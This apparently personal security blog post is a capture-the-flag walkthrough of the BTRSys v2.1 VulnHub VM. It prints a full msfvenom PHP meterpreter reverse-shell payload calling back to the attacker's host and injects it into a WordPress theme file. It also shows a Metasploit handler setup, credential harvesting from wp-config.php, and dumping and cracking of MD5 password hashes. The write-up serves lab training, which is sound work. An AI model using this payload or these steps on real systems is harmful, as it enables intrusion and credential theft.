Amonsec

It's all about security.

A simple blog where you can find different things about digital security.

BTRSys v2: CTF walkthrough

Introduction

Name: BTRSys: v2.1
Date release: 31 Jul 2017

Author: ismailonderkaya
Series: BTRSys
VM link: https://www.vulnhub.com/entry/btrsys-v21,196/

 

Recognition

As usual, we use arp-scan to retrieve the IP address of the targeted system in the same local network.

btrsys_v2_ctf_walkthrough_arp_scan.png

Then, we use nmap to scan open ports, in order to find which services are publicly accessible.

root@kali:~/Desktop# nmap 192.168.1.48

Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-16 22:15 CEST
Nmap scan report for yoda.home (192.168.1.48)
Host is up (0.033s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http
MAC Address: 24:0A:64:9E:6E:74 (AzureWave Technology)

Nmap done: 1 IP address (1 host up) scanned in 123.28 seconds
root@kali:~/Desktop#

Like the first one, the FTP service is useless. Only the port 80 and 22 will be use.

 

WordPress admin panel

In the home page we have a weird gif that link us to another gif. If we read the robots.txt file, the true website will appear.

root@kali:~/Desktop# curl http://192.168.1.48/robots.txt
Disallow: Hackers
Allow: /wordpress/


 .o+.                    :o/                                                   -o+`                
  /hh:                    shh`                                                  +hh-                
  /hh:                    shh`                         -/:                      +hh-                
  /hh:                    shh`                         +s+                      +hh-                
  /hh/............   `....shh-....   ...............`  `-`   `..............`   +hh-          ..    
  /hhyyyyyyyyyyyyy/ `syyyyyhhyyyyy. -yyyyyyyyyyyyyyy/  oys   +ssssssssssssss/   +hh-        .+yy-   
  /hh+---------/hh+  .----yhh:----  :hho------------`  yhy`  oyy------------`   +hh-      .+yys:`   
  /hh:         -hh+       shh`      :hh+               yhy`  oyy                +hh-   `.+yys/`     
  /hh:         -hh+       shh`      :hh+               yhy`  oss          `--   +hhsssssyhy/`       
  /hh:         -hh+       shh`      :hh+               yhy`  `-.          +yy.  +hho+++osyy+.       
  /hh:         -hh+       shh`      :hh+               yhy`               +yy.  +hh-    `/syy+.     
  /hho:::::::::+hh+       shh`      :hh+               yhy`  .::::::::::::oyy.  +hh-      `/yyy/`   
  :yyyyyyyyyyyyyyy:       +ys`      .yy:               oys   +sssssssssssssss`  /ys.        `/sy-   
   ```````````````         `         ``                 `     ``````````````     ``                
root@kali:~/Desktop#

The first thing that I did is to try to log me into the WordPress admin panel and surprisingly the good old admin:admin works.

 

From wordpress to reverse shell

Thanks again for this awesome tutorial TAPE. You can find the tutorial here and the TAPE’s website here.

We can’t add file or themes. Instead of creating a theme we will modify the header.php file of the currently used theme.
First of all, we generate a php.

root@kali:~/Desktop# msfvenom -p php/meterpreter/reverse_tcp LPORT=1337 LHOST=192.168.1.102 -f raw 
No platform was selected, choosing Msf::Module::Platform::PHP from the payload
No Arch selected, selecting Arch: php from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 964 bytes
/*<?php /**/ error_reporting(0); $ip = '192.168.1.102'; $port = 1337; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; eval($b); die();
root@kali:~/Desktop#

We configure our Metasploit handler.

root@kali:~/Desktop# /etc/init.d/postgresql start 
[ ok ] Starting postgresql (via systemctl): postgresql.service.
root@kali:~/Desktop# msfconsole -q
msf > use exploit/multi/handler 
msf exploit(handler) > set PAYLOAD php/meterpreter/reverse_tcp
PAYLOAD => php/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.102
LHOST => 192.168.1.102
msf exploit(handler) > set LPORT 1337
LPORT => 1337
msf exploit(handler) > run 
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 192.168.1.102:1337 
msf exploit(handler) >

We change the content of the header.php file.

btrsys_v2_ctf_walkthrough_header_to_reverse_shell.png

Finally, we have a low privilege reverse shell.

btrsys_v2_ctf_walkthrough_low_reverse_shell.png
 

 Privilege escalation

One more time, config files are rich of information.

meterpreter > shell
Process 1300 created.
Channel 0 created.
/bin/bash -i
bash: cannot set terminal process group (859): Inappropriate ioctl for device
bash: no job control in this shell
www-data@ubuntu:/var/www/html/wordpress$ cat wp-config.php
cat wp-config.php
<?php
[..snip..]
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');

/** MySQL database username */
define('DB_USER', 'root');

/** MySQL database password */
define('DB_PASSWORD', 'rootpassword!');

/** MySQL hostname */
define('DB_HOST', 'localhost');
[..snip..]

Now, we can play with the MySQL, especially with the wp_users table of the wordpress database.

www-data@ubuntu:/var/www/html/wordpress$ mysql -uroot -p -D wordpress -e 'show tables;'
<ml/wordpress$ mysql -uroot -p -D wordpress -e 'show tables;'                
Enter password: rootpassword!
Tables_in_wordpress
wp_abtest_experiments
wp_abtest_goal_hits
wp_abtest_goals
wp_abtest_ip_filters
wp_abtest_variation_views
wp_abtest_variations
wp_commentmeta
wp_comments
wp_links
wp_masta_campaign
wp_masta_cronapi
wp_masta_list
wp_masta_reports
wp_masta_responder
wp_masta_responder_reports
wp_masta_settings
wp_masta_subscribers
wp_masta_support
wp_options
wp_postmeta
wp_posts
wp_term_relationships
wp_term_taxonomy
wp_terms
wp_usermeta
wp_users
www-data@ubuntu:/var/www/html/wordpress$

Let’s see if we can find passwords in the wp_users table.

www-data@ubuntu:/var/www/html/wordpress$ mysql -uroot -p -D wordpress -e 'select * from wp_users;'
<ml/wordpress$ mysql -uroot -p -D wordpress -e 'select * from wp_users;'     
Enter password: rootpassword!
ID    user_login    user_pass    user_nicename    user_email    user_url    user_registered    user_activation_key    user_status    display_name
1    root    a318e4507e5a74604aafb45e4741edd3    btrisk    mdemir@btrisk.com        2017-04-24 17:37:04        0    btrisk
2    admin    21232f297a57a5a743894a0e4a801fc3    admin    ikaya@btrisk.com        2017-04-24 17:37:04        4    admin
www-data@ubuntu:/var/www/html/wordpress$

Nice, we found MD5 passwords. We can easily crack them with the hashkiller website that you can find here.

a318e4507e5a74604aafb45e4741edd3 MD5 : roottoor
21232f297a57a5a743894a0e4a801fc3 MD5 : admin

We have the password of the root user, we need to try it.

Note, due to the fact that we don’t have a real shell, we can’t use the su command but SSH can be use.

btrsys_v2_ctf_walkthrough_root_shell.png
 
 

break